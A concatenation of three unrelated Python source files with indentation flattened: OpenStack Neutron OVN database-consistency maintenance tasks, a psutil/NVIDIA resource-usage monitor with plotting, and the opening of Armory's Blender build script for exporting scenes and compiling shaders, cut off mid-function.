ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
def _get_security_group(self, uuid):
return (self._nb_idl.get_address_set(uuid) or
self._nb_idl.get_port_group(uuid))
@property
def has_lock(self):
return not self._idl.is_lock_contended
def nbdb_schema_updated_hook(self):
if not self.has_lock:
return
for func in self._schema_aware_periodics:
LOG.debug('OVN Northbound DB schema version was updated,'
'invoking "%s"', func.__name__)
try:
func()
except periodics.NeverAgain:
pass
except Exception:
LOG.exception(
'Unknown error while executing "%s"', func.__name__)
def _fix_create_update(self, context, row):
res_map = self._resources_func_map[row.resource_type]
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](context, n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
# If the resource exist in the OVN DB but the revision
# number is different from Neutron DB, updated it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](context, n_obj)
else:
# If the resource exist and the revision number
# is equal on both databases just bump the revision on
# the cache table.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
def _fix_delete(self, context, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
revision_numbers_db.delete_revision(
context, row.resource_uuid, row.resource_type)
else:
res_map['ovn_delete'](context, row.resource_uuid)
def _fix_create_update_subnet(self, context, row):
# Get the lasted version of the port in Neutron DB
sn_db_obj = self._ovn_client._plugin.get_subnet(
context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(context, sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(context, sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
@periodics.periodic(spacing=10, run_immediately=True)
@rerun_on_schema_updates
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if (not self._nb_idl.is_port_groups_supported() or
not self._nb_idl.get_address_sets()):
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
def _log_maintenance_inconsistencies(self, create_update_inconsistencies,
delete_inconsistencies):
if not CONF.debug:
return
def _log(inconsistencies, type_):
if not inconsistencies:
return
c = {}
for f in inconsistencies:
if f.resource_type not in c:
c[f.resource_type] = 1
else:
c[f.resource_type] += 1
fail_str = ', '.join('{}={}'.format(k, v) for k, v in c.items())
LOG.debug('Maintenance task: Number of inconsistencies '
'found at %(type_)s: %(fail_str)s',
{'type_': type_, 'fail_str': fail_str})
_log(create_update_inconsistencies, INCONSISTENCY_TYPE_CREATE_UPDATE)
_log(delete_inconsistencies, INCONSISTENCY_TYPE_DELETE)
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
create_update_inconsistencies = (
revision_numbers_db.get_inconsistent_resources(admin_context))
delete_inconsistencies = (
revision_numbers_db.get_deleted_resources(admin_context))
if not any([create_update_inconsistencies, delete_inconsistencies]):
LOG.debug('Maintenance task: No inconsistencies found. Skipping')
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._log_maintenance_inconsistencies(create_update_inconsistencies,
delete_inconsistencies)
self._sync_timer.restart()
dbg_log_msg = ('Maintenance task: Fixing resource %(res_uuid)s '
'(type: %(res_type)s) at %(type_)s')
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_CREATE_UPDATE})
try:
# NOTE(lucasagomes): The way to fix subnets is bit
# different than other resources. A subnet in OVN language
# is just a DHCP rule but, this rule only exist if the
# subnet in Neutron has the "enable_dhcp" attribute set
# to True. So, it's possible to have a consistent subnet
# resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(admin_context, row)
else:
self._fix_create_update(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix resource '
'%(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_DELETE})
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(admin_context,
row.resource_uuid)
else:
self._fix_delete(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix deleted '
'resource %(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task: Synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, context, port):
router_id = port['device_id']
self._ovn_client._l3_plugin.add_router_interface(
context, router_id, {'port_id': port['id']})
def _check_subnet_global_dhcp_opts(self):
inconsistent_subnets = []
admin_context = n_context.get_admin_context()
subnet_filter = {'enable_dhcp': [True]}
neutron_subnets = self._ovn_client._plugin.get_subnets(
admin_context, subnet_filter)
global_v4_opts = ovn_conf.get_global_dhcpv4_opts()
global_v6_opts = ovn_conf.get_global_dhcpv6_opts()
LOG.debug('Checking %s subnets for global DHCP option consistency',
len(neutron_subnets))
for subnet in neutron_subnets:
ovn_dhcp_opts = self._nb_idl.get_subnet_dhcp_options(
subnet['id'])['subnet']
inconsistent_opts = []
if ovn_dhcp_opts:
if subnet['ip_version'] == n_const.IP_VERSION_4:
for opt, value in global_v4_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if subnet['ip_version'] == n_const.IP_VERSION_6:
for opt, value in global_v6_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if inconsistent_opts:
LOG.debug('Subnet %s has inconsistent DHCP opts: %s',
subnet['id'], inconsistent_opts)
inconsistent_subnets.append(subnet)
return inconsistent_subnets
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600,
run_immediately=True)
def check_global_dhcp_opts(self):
# This periodic task is included in DBInconsistenciesPeriodics since
# it uses the lock to ensure only one worker is executing
if not self.has_lock:
return
if (not ovn_conf.get_global_dhcpv4_opts() and
not ovn_conf.get_global_dhcpv6_opts()):
# No need to scan the subnets if the settings are unset.
raise periodics.NeverAgain()
LOG.debug('Maintenance task: Checking DHCP options on subnets')
self._sync_timer.restart()
fix_subnets = self._check_subnet_global_dhcp_opts()
if fix_subnets:
admin_context = n_context.get_admin_context()
LOG.debug('Triggering update for %s subnets', len(fix_subnets))
for subnet in fix_subnets:
neutron_net = self._ovn_client._plugin.get_network(
admin_context, subnet['network_id'])
try:
self._ovn_client.update_subnet(admin_context, subnet,
neutron_net)
except Exception:
LOG.exception('Failed to update subnet %s',
subnet['id'])
self._sync_timer.stop()
LOG.info('Maintenance task: DHCP options check finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=1800, run_immediately=True)
def check_metadata_ports(self):
# If OVN metadata is disabled do not run this task again
if not ovn_conf.is_ovn_metadata_enabled():
raise periodics.NeverAgain()
# Make sure that only one worker is executing this
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
for n in self._ovn_client._plugin.get_networks(admin_context):
self._ovn_client.create_metadata_port(admin_context, n)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the U cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_port_security_unknown_address(self):
if not self.has_lock:
return
for port in self._nb_idl.lsp_list().execute(check_error=True):
if port.type == ovn_const.LSP_TYPE_LOCALNET:
continue
addresses = port.addresses
type_ = port.type.strip()
if not port.port_security:
if not type_ and ovn_const.UNKNOWN_ADDR not in addresses:
addresses.append(ovn_const.UNKNOWN_ADDR)
elif type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
else:
if type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
elif not type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
if addresses:
self._nb_idl.lsp_set_addresses(
port.name, addresses=addresses).execute(check_error=True)
else:
self._nb_idl.db_clear(
'Logical_Switch_Port', port.name,
'addresses').execute(check_error=True)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_fragmentation_support(self):
if not self.has_lock:
return
context = n_context.get_admin_context()
for net in self._ovn_client._plugin.get_networks(
context, {external_net.EXTERNAL: [True]}):
self._ovn_client.set_gateway_mtu(context, net)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_igmp_snoop_support(self):
if not self.has_lock:
return
with self._nb_idl.transaction(check_error=True) as txn:
value = ('true' if ovn_conf.is_igmp_snooping_enabled()
else 'false')
for ls in self._nb_idl.ls_list().execute(check_error=True):
if ls.other_config.get(ovn_const.MCAST_SNOOP, None) == value:
continue
txn.add(self._nb_idl.db_set(
'Logical_Switch', ls.name,
('other_config', {
ovn_const.MCAST_SNOOP: value,
ovn_const.MCAST_FLOOD_UNREGISTERED: value})))
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_ha_chassis_group_address(self):
# If external ports is not supported stop running
# this periodic task
if not self._ovn_client.is_external_ports_supported():
raise periodics.NeverAgain()
if not self.has_lock:
return
default_ch_grp = self._nb_idl.ha_chassis_group_add(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, may_exist=True).execute(
check_error=True)
# NOTE(lucasagomes): Find the existing chassis with the highest
# priority and keep it as being the highest to avoid moving
# things around
high_prio_ch = max(default_ch_grp.ha_chassis, key=lambda x: x.priority,
default=None)
all_ch = self._sb_idl.get_all_chassis()
gw_ch = self._sb_idl.get_gateway_chassis_from_cms_options()
ch_to_del = set(all_ch) - set(gw_ch)
with self._nb_idl.transaction(check_error=True) as txn:
for ch in ch_to_del:
txn.add(self._nb_idl.ha_chassis_group_del_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, ch,
if_exists=True))
# NOTE(lucasagomes): If the high priority chassis is in
# the list of chassis to be added/updated. Add it first with
# the highest priority number possible and then add the rest
# (the priority of the rest of the chassis does not matter
# since only the highest one is active)
priority = ovn_const.HA_CHASSIS_GROUP_HIGHEST_PRIORITY
if high_prio_ch and high_prio_ch.chassis_name in gw_ch:
txn.add(self._nb_idl.ha_chassis_group_add_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
high_prio_ch.chassis_name, priority=priority))
gw_ch.remove(high_prio_ch.chassis_name)
priority -= 1
for ch in gw_ch:
txn.add(self._nb_idl.ha_chassis_group_add_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
ch, priority=priority))
priority -= 1
raise periodics.NeverAgain()
class HashRingHealthCheckPeriodics(object):
def __init__(self, group):
self._group = group
self.ctx = n_context.get_admin_context()
@periodics.periodic(spacing=ovn_const.HASH_RING_TOUCH_INTERVAL)
def touch_hash_ring_nodes(self):
# NOTE(lucasagomes): Note that we do not rely on the OVSDB lock
# here because we want the maintenance tasks from each instance to
# execute this task.
hash_ring_db.touch_nodes_from_host(self.ctx, self._group)
|
monitor.py
|
""" Monitoring (memory usage, cpu/gpu utilization) tools. """
import os
import time
from math import ceil
from multiprocessing import Process, Manager, Queue
import numpy as np
import matplotlib.pyplot as plt
try:
import psutil
except ImportError:
pass
try:
import nvidia_smi
except ImportError:
# Use this value to raise ImportError later
nvidia_smi = None
class ResourceMonitor:
""" Periodically runs supplied function in a separate process and stores its outputs.
The created process runs infinitely until it is killed by SIGKILL signal.
Parameters
----------
function : callable
Function to use. If not provided, defaults to the `get_usage` static method.
frequency : number
Periodicity of function calls in seconds.
**kwargs
Passed directly to `function` calls.
Attributes
----------
data : list
Collected function outputs. Preserved between multiple runs.
ticks : list
Times of function calls. Preserved between multiple runs.
"""
def __init__(self, function=None, frequency=0.1, **kwargs):
self.function = function or self.get_usage
self.frequency = frequency
self.kwargs = kwargs
self.pid = os.getpid()
self.running = False
self.stop_queue = None
self.shared_list = None
self.process = None
self.start_time, self.prev_time, self.end_time = None, None, None
self.ticks, self.data = [], []
@staticmethod
def endless_repeat(shared_list, stop_queue, function, frequency, **kwargs):
""" Repeat `function` and storing results, until `stop` signal is recieved. """
while stop_queue.empty():
# As this process is killed ungracefully, it can be shut down in the middle of data appending.
# We let Python handle it by ignoring the exception.
try:
shared_list.append(function(**kwargs))
except (BrokenPipeError, ConnectionResetError):
pass
time.sleep(frequency)
def start(self):
""" Start a separate process with function calls every `frequency` seconds. """
self.running = True
manager = Manager()
self.shared_list = manager.list()
self.stop_queue = Queue()
self.start_time = time.time()
self.prev_time = self.start_time
args = self.shared_list, self.stop_queue, self.function, self.frequency
self.process = Process(target=self.endless_repeat, args=args, kwargs={'pid': self.pid, **self.kwargs})
self.process.start()
def fetch(self):
""" Append collected data to the instance attributes. """
n = len(self.data)
# We copy data so additional points don't appear during this function execution
self.data = self.shared_list[:]
self.end_time = time.time()
# Compute one more entry
point = self.function(pid=self.pid, **self.kwargs)
tick = time.time()
# Update timestamps, append additional entries everywhere
# If data was appended to `shared_list` during the execution of this function, the order might be wrong;
# But, as it would mean that the time between calls to `self.function` is very small, it is negligeable.
self.ticks.extend(np.linspace(self.prev_time, self.end_time, num=len(self.data) - n).tolist())
self.data.append(point)
self.shared_list.append(point)
self.ticks.append(tick)
self.prev_time = time.time()
def stop(self):
""" Stop separate process. """
self.stop_queue.put(True)
self.process.join()
self.running = False
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.fetch()
self.stop()
def visualize(self):
""" Simple plots of collected data-points. """
plt.figure(figsize=(8, 6))
plt.plot(np.array(self.ticks) - self.ticks[0], self.data)
name = self.__class__.__name__
title = f'{name}\nMEAN: {np.mean(self.data):4.4} STD: {np.std(self.data):4.4}'
plt.title(title)
plt.xlabel('Time, s', fontsize=12)
plt.ylabel(self.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
plt.grid(True)
plt.show()
class CPUMonitor(ResourceMonitor):
""" Track CPU usage. """
UNIT = '%'
@staticmethod
def get_usage(**kwargs):
""" Track CPU usage. """
_ = kwargs
return psutil.cpu_percent()
class MemoryMonitor(ResourceMonitor):
""" Track total virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(**kwargs):
""" Track total virtual memory usage. """
_ = kwargs
return psutil.virtual_memory().used / (1024 **3)
class RSSMonitor(ResourceMonitor):
""" Track non-swapped physical memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track non-swapped physical memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_info().rss / (1024 ** 2) # mbytes
class VMSMonitor(ResourceMonitor):
""" Track current process virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track current process virtual memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_info().vms / (1024 ** 3) # gbytes
class USSMonitor(ResourceMonitor):
""" Track current process unique virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track current process unique virtual memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_full_info().uss / (1024 ** 3) # gbytes
class GPUMonitor(ResourceMonitor):
""" Track GPU usage. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU usage. """
_ = kwargs
gpu_list = gpu_list or [0]
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
return [item.gpu for item in res]
class GPUMemoryUtilizationMonitor(ResourceMonitor):
""" Track GPU memory utilization. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU memory utilization. """
_ = kwargs
gpu_list = gpu_list or [0]
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
return [item.memory for item in res]
class GPUMemoryMonitor(ResourceMonitor):
""" Track GPU memory usage. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU memory usage. """
_ = kwargs
gpu_list = gpu_list or [0]
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetMemoryInfo(item) for item in handle]
res = [100 * item.used / item.total for item in res]
nvidia_smi.nvmlShutdown()
return res
MONITOR_ALIASES = {
MemoryMonitor: ['mmonitor', 'memory', 'memorymonitor'],
CPUMonitor: ['cmonitor', 'cpu', 'cpumonitor'],
RSSMonitor: ['rss'],
VMSMonitor: ['vms'],
USSMonitor: ['uss'],
GPUMonitor: ['gpu'],
GPUMemoryMonitor: ['gpu_memory'],
GPUMemoryUtilizationMonitor: ['gpu_memory_utilization']
}
MONITOR_ALIASES = {alias: monitor for monitor, aliases in MONITOR_ALIASES.items()
for alias in aliases}
class Monitor(list):
""" Holder for multiple monitors with simple visualization method. """
def __init__(self, monitors=('cpu', 'memory', 'gpu'), frequency=0.1, **kwargs):
monitors = [monitors] if not isinstance(monitors, (tuple, list)) else monitors
monitors = [MONITOR_ALIASES[monitor.lower()](frequency=frequency, **kwargs)
if isinstance(monitor, str) else monitor
for monitor in monitors]
super().__init__(monitors)
def __enter__(self):
for monitor in self:
monitor.start()
return self[0] if len(self) == 0 else self
def __exit__(self, exc_type, exc_value, exc_traceback):
for monitor in self:
monitor.fetch()
monitor.stop()
def visualize(self, layout=None, figsize=None, suptitle='', savepath=None, show=True):
""" Visualize multiple monitors in a single figure.
Parameters
----------
layout : tuple of ints
Grid layout of plots.
figsize : tuple of numbers
Size of figure: width and height.
suptitle : str
Title for the figure.
"""
if layout is None:
layout = ceil(len(self) / 3), 3 if len(self) > 2 else len(self)
figsize = figsize or (7 * layout[1], 8 * layout[0])
fig, ax = plt.subplots(*layout, figsize=figsize)
ax = np.atleast_2d(ax)
for i, monitor in enumerate(self):
name = monitor.__class__.__name__
title = f'{name}\nMEAN: {np.mean(monitor.data):4.4} STD: {np.std(monitor.data):4.4}'
ax[i // layout[1], i % layout[1]].plot(np.array(monitor.ticks) - monitor.ticks[0], monitor.data)
ax[i // layout[1], i % layout[1]].set_title(title, fontsize=16)
ax[i // layout[1], i % layout[1]].set_xlabel('Time, s', fontsize=14)
ax[i // layout[1], i % layout[1]].set_ylabel(monitor.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
ax[i // layout[1], i % layout[1]].grid(True)
for i in range(len(self), layout[0] * layout[1]):
ax[i // layout[1], i % layout[1]].set_axis_off()
if suptitle:
fig.suptitle(suptitle, fontsize=24)
if savepath:
plt.savefig(savepath, bbox_inches='tight', pad_inches=0)
if show:
plt.show()
else:
plt.close()
|
make.py
|
import glob
import json
import os
import shutil
import time
import stat
import subprocess
import threading
import webbrowser
import shlex
import bpy
import arm.assets as assets
from arm.exporter import ArmoryExporter
import arm.lib.make_datas
import arm.lib.server
import arm.log as log
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_state as state
import arm.make_world as make_world
import arm.utils
import arm.write_data as write_data
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
wrd = bpy.data.worlds['Arm']
print('\n' + '_' * 10 + ' [Armory] Compiling ' + '_' * 10)
if wrd.arm_verbose_output:
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if not wrd.arm_cache_build:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
# have a "zoo" collection in the current scene
export_coll = bpy.data.collections.new("export_coll")
bpy.context.scene.collection.children.link(export_coll)
for scene in bpy.data.scenes:
if scene == bpy.context.scene: continue
for o in scene.collection.all_objects:
if o.type == "MESH" or o.type == "EMPTY":
if o.name not in export_coll.all_objects.keys():
export_coll.objects.link(o)
depsgraph = bpy.context.evaluated_depsgraph_get()
bpy.data.collections.remove(export_coll) # destroy "zoo" collection
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.lz4' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
ArmoryExporter.export_scene(bpy.context, asset_path, scene=scene, depsgraph=depsgraph)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
if wrd.arm_verbose_output:
print('Exported modules:', modules)
print('Shader flags:', defs)
print('Compositor flags:', cdefs)
print('Khafile flags:', assets.khafile_defs)
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {'shader_datas': []}
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
# Workaround to also export non-material world shaders
res['shader_datas'] += make_world.shader_datas
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
